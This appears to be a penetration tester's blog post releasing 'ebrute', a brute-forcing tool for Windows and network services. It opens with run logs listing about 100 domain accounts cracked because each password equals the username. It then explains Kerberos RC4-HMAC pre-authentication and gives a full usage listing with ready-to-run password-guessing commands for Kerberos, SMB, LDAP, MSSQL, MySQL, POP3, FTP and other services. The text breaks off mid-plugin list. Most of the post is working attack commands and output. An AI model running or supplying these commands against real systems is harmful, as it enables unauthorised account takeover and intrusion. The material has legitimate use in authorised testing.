[18]  HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[32]  HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'MARION.ADAM' | PASS: 'MARION.ADAM' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[30]  HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[25]  HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[4]  HOST: '192.168.8.88' | USER: 'HIGGINBOTHAM.ARNOLD' | PASS: 'HIGGINBOTHAM.ARNOLD' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly r
duce threads (Attempt 1/5)]
[21]  HOST: '192.168.8.88' | USER: 'HIGGINBOTHAM.ROLAND' | PASS: 'HIGGINBOTHAM.ROLAND' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly
educe threads (Attempt 1/5)]
Tasks remaining: 1,611,693    (Performance: ~394,111 tasks/minute, 5 minutes remain)
Tasks remaining: 1,218,180    (Performance: ~393,513 tasks/minute, 4 minutes remain)
Tasks remaining: 824,069    (Performance: ~394,111 tasks/minute, 3 minutes remain)
Increasing theadcount to: 33
Increasing theadcount to: 34
Increasing theadcount to: 35
Increasing theadcount to: 36
Increasing theadcount to: 37
Increasing theadcount to: 38
Increasing theadcount to: 39
Increasing theadcount to: 40
[28]  HOST: '192.168.8.88' | USER: 'MERRIWEATHER.DALE' | PASS: 'MERRIWEATHER.DALE' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly redu
e threads (Attempt 1/5)]
Tasks remaining: 413,452    (Performance: ~410,617 tasks/minute, 2 minutes remain)
[19]  HOST: '192.168.8.88' | USER: 'SENG.MARIO' | PASS: 'SENG.MARIO' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (At
empt 1/5)]
[38]  HOST: '192.168.8.88' | USER: 'DANKO.SCOTT' | PASS: 'DANKO.SCOTT' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (
ttempt 1/5)]
[8]  HOST: '192.168.8.88' | USER: 'TORIBIO.DARRELL' | PASS: 'TORIBIO.DARRELL' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce th
eads (Attempt 1/5)]
Tasks remaining: 2,581    (Performance: ~410,871 tasks/minute, 1 minutes remain)
Complete: 07/12/2011 11:27:44
Stats:    00:06:13    (~401,925 tasks/minute) (Performed 2,500,000 / 2,500,000 tasks)


Summary of Authentication Successes:
HOST: '192.168.8.88' | USER: 'SMITH.RONNIE' | PASS: 'SMITH.RONNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JOHNSON.PHILIP' | PASS: 'JOHNSON.PHILIP' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WILLIAMS.HUGH' | PASS: 'WILLIAMS.HUGH' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROWN.STEVEN' | PASS: 'BROWN.STEVEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROWN.DANIEL' | PASS: 'BROWN.DANIEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JONES.JAIME' | PASS: 'JONES.JAIME' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JONES.KEN' | PASS: 'JONES.KEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JONES.BOB' | PASS: 'JONES.BOB' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MILLER.PHILIP' | PASS: 'MILLER.PHILIP' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DAVIS.FRANCIS' | PASS: 'DAVIS.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DAVIS.FRANCIS' | PASS: 'DAVIS.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GARCIA.KEVIN' | PASS: 'GARCIA.KEVIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WILSON.JOHN' | PASS: 'WILSON.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WILSON.ROBERT' | PASS: 'WILSON.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDERSON.GARY' | PASS: 'ANDERSON.GARY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDERSON.TIMOTHY' | PASS: 'ANDERSON.TIMOTHY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDERSON.DEAN' | PASS: 'ANDERSON.DEAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LEE.HENRY' | PASS: 'LEE.HENRY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CLARK.TONY' | PASS: 'CLARK.TONY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CLARK.BRYAN' | PASS: 'CLARK.BRYAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ALLEN.RON' | PASS: 'ALLEN.RON' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SCOTT.JOHN' | PASS: 'SCOTT.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SCOTT.ROBERT' | PASS: 'SCOTT.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SCOTT.MICHAEL' | PASS: 'SCOTT.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ADAMS.BYRON' | PASS: 'ADAMS.BYRON' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ADAMS.JULIAN' | PASS: 'ADAMS.JULIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HILL.STUART' | PASS: 'HILL.STUART' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HILL.AUSTIN' | PASS: 'HILL.AUSTIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MITCHELL.TODD' | PASS: 'MITCHELL.TODD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'EVANS.JOHNNY' | PASS: 'EVANS.JOHNNY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TURNER.ERIC' | PASS: 'TURNER.ERIC' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TURNER.SCOTT' | PASS: 'TURNER.SCOTT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TURNER.RICKY' | PASS: 'TURNER.RICKY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'EDWARDS.HOWARD' | PASS: 'EDWARDS.HOWARD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.LUIS' | PASS: 'COOPER.LUIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.MIKE' | PASS: 'COOPER.MIKE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.LUIS' | PASS: 'COOPER.LUIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.MIKE' | PASS: 'COOPER.MIKE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BAILEY.FRANCIS' | PASS: 'BAILEY.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'KELLY.MICHAEL' | PASS: 'KELLY.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DIAZ.RICARDO' | PASS: 'DIAZ.RICARDO' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WOOD.JIM' | PASS: 'WOOD.JIM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.ALLEN' | PASS: 'BROOKS.ALLEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.JOEL' | PASS: 'BROOKS.JOEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.ALLEN' | PASS: 'BROOKS.ALLEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.JOEL' | PASS: 'BROOKS.JOEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BENNETT.DARYL' | PASS: 'BENNETT.DARYL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BENNETT.JEFF' | PASS: 'BENNETT.JEFF' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GRAY.NORMAN' | PASS: 'GRAY.NORMAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ORTIZ.JOHNNIE' | PASS: 'ORTIZ.JOHNNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HENDERSON.CHAD' | PASS: 'HENDERSON.CHAD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'KIM.DARYL' | PASS: 'KIM.DARYL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'FORD.ROSS' | PASS: 'FORD.ROSS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WELLS.BRADLEY' | PASS: 'WELLS.BRADLEY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WELLS.BRADLEY' | PASS: 'WELLS.BRADLEY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TUCKER.FRANCIS' | PASS: 'TUCKER.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TUCKER.FRANCIS' | PASS: 'TUCKER.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CRAWFORD.KENT' | PASS: 'CRAWFORD.KENT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HUNTER.TROY' | PASS: 'HUNTER.TROY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HOLMES.FREDDIE' | PASS: 'HOLMES.FREDDIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SMITH.JOHN' | PASS: 'SMITH.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ROSE.MARCUS' | PASS: 'ROSE.MARCUS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MEDINA.JACKIE' | PASS: 'MEDINA.JACKIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'PAYNE.JAY' | PASS: 'PAYNE.JAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'PAYNE.JAY' | PASS: 'PAYNE.JAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HAWKINS.OSCAR' | PASS: 'HAWKINS.OSCAR' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HAWKINS.OSCAR' | PASS: 'HAWKINS.OSCAR' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CUNNINGHAM.RONNIE' | PASS: 'CUNNINGHAM.RONNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.ROBERT' | PASS: 'ANDREWS.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.MICHAEL' | PASS: 'ANDREWS.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.DAVID' | PASS: 'ANDREWS.DAVID' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.WILLIAM' | PASS: 'ANDREWS.WILLIAM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GREENE.PAUL' | PASS: 'GREENE.PAUL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GREENE.DANIEL' | PASS: 'GREENE.DANIEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LAWSON.ALVIN' | PASS: 'LAWSON.ALVIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LAWSON.TIM' | PASS: 'LAWSON.TIM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GILBERT.MARK' | PASS: 'GILBERT.MARK' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DEAN.GORDON' | PASS: 'DEAN.GORDON' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MCCOY.BRIAN' | PASS: 'MCCOY.BRIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'STEELE.EDWIN' | PASS: 'STEELE.EDWIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SIMON.FRED' | PASS: 'SIMON.FRED' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HUBBARD.LUTHER' | PASS: 'HUBBARD.LUTHER' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'FLYNN.ADRIAN' | PASS: 'FLYNN.ADRIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MORROW.CLIFFORD' | PASS: 'MORROW.CLIFFORD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MORROW.CLIFFORD' | PASS: 'MORROW.CLIFFORD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ALLISON.BRUCE' | PASS: 'ALLISON.BRUCE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BRENNAN.TRACY' | PASS: 'BRENNAN.TRACY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SHANNON.BEN' | PASS: 'SHANNON.BEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ROCHA.RAY' | PASS: 'ROCHA.RAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ROCHA.RAY' | PASS: 'ROCHA.RAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'VILLA.ROGER' | PASS: 'VILLA.ROGER' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'FARLEY.ROSS' | PASS: 'FARLEY.ROSS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LEARY.BEN' | PASS: 'LEARY.BEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MARION.ADAM' | PASS: 'MARION.ADAM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success'


You now have many more user accounts to guess passwords for.

Kerberos Authentication
Kerberos authentication was undertaken establishing the cipher suites supported by each version of windows and reading of the RFCs.

Lots of different cipher suites are supported:
  • AES256-CTS-HMAC-SHA1-96
  • AES128-CTS-HMAC-SHA1-96
  • RC4-HMAC
  • DES-CBC-MD5
  • DES-CBC-CRC
Send an AS-REQ using one of the ciphers above
  • RC4-HMAC supported across Windows 2000/2003/2008
  • K = MD4 the user password (NTLM)
  • K1 = HMAC-MD5(K, MessageType)
  • Checksum = HMAC-MD5(K1,Timestamp)
  • K3 = HMAC-MD5(K1,Checksum)
  • EncryptedTimestamp = RC4(Timestamp,K3)
  • Request includes a concatenation of the Checksum and EncryptedTimestamp
An example below demonstrates the kerberos authentication plugin:

C:\tools\dev\br>ebrute -r kerbauth -u abc,administrator,test -j -n -P c:\tools\wl\std.txt -h 192.168.8.23 -e win2k3r2dom
ain -t 32
ebrute v0.76 - Edward Torkington
Loading passes...
Parsing passes...
Added:    3 user(s), 28,881 password(s), 1 host(s),  + joeycheck  + blankcheck 86,649 tasks over 32 thread/s.
Starting: 06/12/2011 15:46:12
[21]  HOST: '192.168.8.23' | USER: 'administrator' | PASS: 'Passw0rd123' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[13]  HOST: '192.168.8.23' | USER: 'test' | PASS: 'password' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
Complete: 06/12/2011 15:46:37
Stats:    00:00:25    (~136,486 tasks/minute) (Performed 56,918 / 86,649 tasks)


Summary of Authentication Successes:
HOST: '192.168.8.23' | USER: 'administrator' | PASS: 'Passw0rd123' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'test' | PASS: 'password' | EXTRA: 'win2k3r2domain' | Return code: 'Success'

Of course you could also use LDAP, SMB and FTP but kerberos is a lot quicker.
NB: The kerberos authentication plugin only runs over UDP at the moment and as such if you are getting errors you will have to resort to one of the other plugins. The kerberos enumeration plugin runs over both UDP and TCP with the former being quickest.

ebrute - service brute-forcer


I thought it was about time that I released my service brute-forcer. It does a lot of what the other brute-forcers do but has some nice features which I find essential on pen tests. In particular, I wrote a kerberos enumeration plugin which allows you to validate the existence of user accounts on locked down (no enumeration over null sessions or via RID cycling) Windows 2k/2k3/2k8 domain controllers without using a password guess. On a decent server you can validate over a million user accounts a minute and with some clever dictionaries typically obtain around 70% of the domain user accounts. See the blog post for more details. Key features:

Large protocol support
  • FTP
  • FINGER (used for seeing output e.g. root@ etc.)
  • KERBENUM (Fast username validation without using a password guess against Windows2k/2k3/2k8 Domain Controllers)
  • KERBAUTH (Fast authentication on Domain Controllers)
  • LDAP (Nearly as fast domain/non-domain brute force)
  • Local authentication (quick priv esc approx 800,000 guesses a minute)
  • MSSQL (raw TDS, ODBC, OLEDB and managed driver support to try and prevent any strange failures)
  • MYSQL
  • Oracle password checking (turns it from a ~4meg app to ~80meg :-( so this is temporarily out)
  • Oracle SID brute forcing (turns it from a ~4meg app to ~80meg :-( so this is temporarily out)
  • POP3
  • POSTGRES
  • Process (shell your own processes and look at the exit code)
  • SMB via the API(LM, NTLM and more importantly NTLMv2)
  • SMB via raw packets (LMv2 and NTLMv2 with dictionary/hashes)
  • SMTP (BASIC, cram, NTLM)
  • SNMP (v2 comminity name support only at the sec)
  • SSH (2 implementations, both seem similar but sometimes one works better than the other)
  • TFTP (brute force valid files)
  • VMWARE (virtual centre and ESX server authentications)
  • VNC
  • WMI useful if you only have TCP port 135 open
  • WWW (BASIC, DIGEST, NTLM and more importantly NTLMv2)
  • Also some quick fuzzers, random TCP/UDP data, random TCP data with a valid TKPT header 
Decent feedback
  • Tells you progress each minute with and estimated finish time
  • Pause and resume the job - useful if looking at wireshark or temporarily switching VLANs (p key)
  • Increase and Decrease the threads mid flow (-+ keys)
  • Press any key for instant updates
  • Increase and decrease debug level while it is running (v/b)
  • Says why things are succeeding/failing, i.e. not just that it failed
  • Attempts to tell you if remote auth is even enabled (e.g. mssql, mysql, postgres)
  • Optionally log all output to a file  
Powerful username, password and host inputs
  • read a single user or pass
  • read a users or passes from file
  • prefix a constant onto a username or pass
  • add a constant onto the end of a username or pass
  • set min max lengths for user and pass inputs
  • switch for checking for blank and or joey passwords
  • input users and passes from a list
  • read a single host
  • read hosts from a file
  • use hosts and services specified from nmap/nessus output
Other bits
  • Shared password optimization (i.e. spread your attempts across hosts sharing the same creds like a local admin pass...)
  • Port scanner built in so just give it a range e.g. 192.168.8.1-254
  • Auto retries on failed attempts 5 times
  • Configurable port, ssl options and timeouts (although not all plugins support this at the sec)
  • Save the progress at any time by pressing F12
  • Requires .net framework 2 or above.
Limitations and future work
  • Loads all the passwords at the start so it's a proper memory hog.
  • Probably a million bugs - just let me know.
Download:
http://www.r00t.tv/p/downloads.html

Details:

C:\tools\dev\br>ebrute.exe
ebrute v0.76 - Edward Torkington
Usage: ebrute.exe -r [plugin] [options] [-u user|-U userfile] [-p pass|-P passfile] [-h host/hostrange|-H hostfile]
  -u    Username (, separated)
  -U    File containing usernames
  -up   Username prefix
  -us   Username suffix
  -uml  Username min length
  -uxl  Username max length
  -p    Password (, separated)
  -P    File containing passwords
  -pp   Password prefix
  -ps   Password suffix
  -pml  Password min length
  -pxl  Password max length
  -h    Host or range (nmap style)
  -H    File containing hosts
  -s    Connect via SSL
  -pn   Port number if not default
  -c    File, colon separated 'login:pass' format, instead of -U/-P options
  -R    File, with restore information saved via F12
  -j    Joey check
  -n    Null/blank check
  -S    Shared passwords optimisation
  -t    Number of threads [1].
  -d    Check all passwords for each user (default removes user after success)
  -un   Always perform uniqueness checks (default <5000 items otherwise slow startup...)
  -df   Disable the user filter (ignores guest, support, kerberos, IIS accounts etc...)
  -a    Disable host connectivity checks
  -l    File to output log to
  -sr   Max retries for scanner to determine if the service is alive [3]
  -sr   Max timeout in ms for scanner to determine if the service is alive [500]
  -jp   Just print out the attempts to be made
  -v    Verbose
  -vv   Very Verbose
  -vvv  Very Very Verbose
  -e    Extra parameters to pass to plugin
  -de   Forced delay between tasks (ms)
  -r    plugin - see below
  -rr   view detailed plugin help
finger ftp kerbauth kerbenum kerbenumtcp ldap lw mssql
mssqlodbc mssqlole mssqlmanaged mysql pop3 postgres process smbrawlmv2sh
smbrawlmv2mh smbrawntlmv2mh smbapilm smbapintlm smbapintlmv2 smtplogin smtpcram smtpntlm
smtpntlmbasic snmp ssh sshalt tcpfuzzerrandom tkpt tkptrandom tftp
udpfuzzerrandom vmware vnc wmi wwwbasic wwwdigest wwwntlm wwwntlmv2


  Keys during tasks
        v to increase debug level
        b to decrease debug level
        + to increase active threads
        - to decrease active threads
        p to pause/resume current job
        s to show authentication successes so far
        d to delete an IP address from the list
        F12 to save current progress, resume with parameter -R.
        Control + c to quit nicely (hold down to force!)


ERROR: No hosts specified.

C:\tools\dev\br>ebrute -rr
ebrute v0.76 - Edward Torkington
Usage: ebrute.exe -r [plugin] [options] [-u user|-U userfile] [-p pass|-P passfile] [-h host/hostrange|-H hostfile]
  -u    Username (, separated)
  -U    File containing usernames
  -up   Username prefix
  -us   Username suffix
  -uml  Username min length
  -uxl  Username max length
  -p    Password (, separated)
  -P    File containing passwords
  -pp   Password prefix
  -ps   Password suffix
  -pml  Password min length
  -pxl  Password max length
  -h    Host or range (nmap style)
  -H    File containing hosts
  -s    Connect via SSL
  -pn   Port number if not default
  -c    File, colon separated 'login:pass' format, instead of -U/-P options
  -R    File, with restore information saved via F12
  -j    Joey check
  -n    Null/blank check
  -S    Shared passwords optimisation
  -t    Number of threads [1].
  -d    Check all passwords for each user (default removes user after success)
  -un   Always perform uniqueness checks (default <5000 items otherwise slow startup...)
  -df   Disable the user filter (ignores guest, support, kerberos, IIS accounts etc...)
  -a    Disable host connectivity checks
  -l    File to output log to
  -sr   Max retries for scanner to determine if the service is alive [3]
  -sr   Max timeout in ms for scanner to determine if the service is alive [500]
  -jp   Just print out the attempts to be made
  -v    Verbose
  -vv   Very Verbose
  -vvv  Very Very Verbose
  -e    Extra parameters to pass to plugin
  -de   Forced delay between tasks (ms)
  -r    plugin - see below
  -rr   view detailed plugin help

Name:         finger
Description:  Finger enumeration plugin
Extra params: Specify any char to enable fast mode. Warning it can temporarily kill the service!
Examples:     -r finger -P fingerids.txt -h 10.0.0.1

Name:         ftp
Description:  FTP plugin
Extra params: None
Examples:     -r=ftp -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         kerbauth
Description:  Kerberos authentication plugin [2k3/2k8]
Extra params: [REQUIRED] Windows domain
Examples:     -r kerbauth -e shcdomain -u administrator,admin -P passes.txt -h 10.0.0.1

Name:         kerbenum
Description:  Kerberos user enumeration plugin [2k3/2k8]
Extra params: [REQUIRED] Windows domain
Examples:     -r=kerbenum -e=rootmedomain -P=c:\userlist.txt -h=10.0.0.1 -t=16

Name:         kerbenumtcp
Description:  Kerberos user enumeration plugin (TCP) [2k3/2k8]
Extra params: [REQUIRED] Windows domain
Examples:     -r=kerbenum -e=rootmedomain -P=c:\userlist.txt -h=10.0.0.1 -t=16

Name:         ldap
Description:  ldap plugin [2k3]
Extra params: The Windows domain (essential for windows auth!)
Examples:     -r=ldap -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8 -e=win2k3r2domain

Name:         lw
Description:  Local Windows plugin
Extra params: None
Examples:     -r=lw -u=administrator -P=c:\passes.txt -h=127.0.0.1 -t=8

Name:         mssql
Description:  MSSQL SQL Server auth plugin (raw!)
Extra params: None
Examples:     -r=mssql -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mssqlodbc
Description:  MSSQL SQL Server auth plugin (ODBC connection)
Extra params: None
Examples:     -r=mssqlodbc -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mssqlole
Description:  MSSQL SQL Server auth plugin (OLEDB Connection)
Extra params: None
Examples:     -r=mssqlole -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mssqlmanaged
Description:  MSSQL SQL Server auth plugin (Managed Code)
Extra params: None
Examples:     -r=mssqlmanaged -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mysql
Description:  MySQL SQL Server auth plugin
Extra params: None
Examples:     -r=mysql -u=root -P=c:\passes.txt -h=10.0.0.1 -t=4

Name:         pop3
Description:  POP3 plugin
Extra params: If IIS, fully qualified domain, e.g. example.com
Examples:     -r pop3 -h 74.125.79.109 -s -u test@gmail.com -P passes.txt

Name:         postgres
Description:  Postgres SQL Server auth plugin
Extra params: None
Examples:     -r=postgres -u=postgres -P=c:\passes.txt -h=10.0.0.1 -j -n -t=4

Name:         process
Description:  External process plugin
Extra params: postiveExitCode:::command .e.g.
Examples:     -e=1:::a.exe -a -u #user# -p #pass# -pn #port# -e #extra#

Name:         smbrawlmv2sh
Description:  SMB Raw LMv2 plugin [prob more XP/Vista/W2K3/W2K8 any LM setting, single host only!]
Extra params: None
Examples:     -r=smbrawlmv2 -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         smbrawlmv2mh
Description:  SMB Raw LMv2 plugin (ensures a single thread per host)
Extra params: None
Examples:     -r=smbrawlmv2mh -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         smbrawntlmv2mh
Description:  SMB Raw NTLMv2 plugin [no vista/2k8 support + ensures single thread per host]
Extra params: None
Examples:     -r=smbrawntlm2single -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         smbapilm
Description:  SMB plugin (LM lm=0 compatible with 0,1,2 and 3)
Extra params: Domain, e.g. companyx
Examples:     -r=smbapilm -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=1

Name:         smbapintlm
Description:  SMB plugin (NTLM lm=2 compatible with 3,4 and 5)
Extra params: Domain, e.g. companyx
Examples:     -r=smbapintlm -U=c:\users.txt -P=c:\passes.txt -h=10.0.0.1 -t=1

Name:         smbapintlmv2
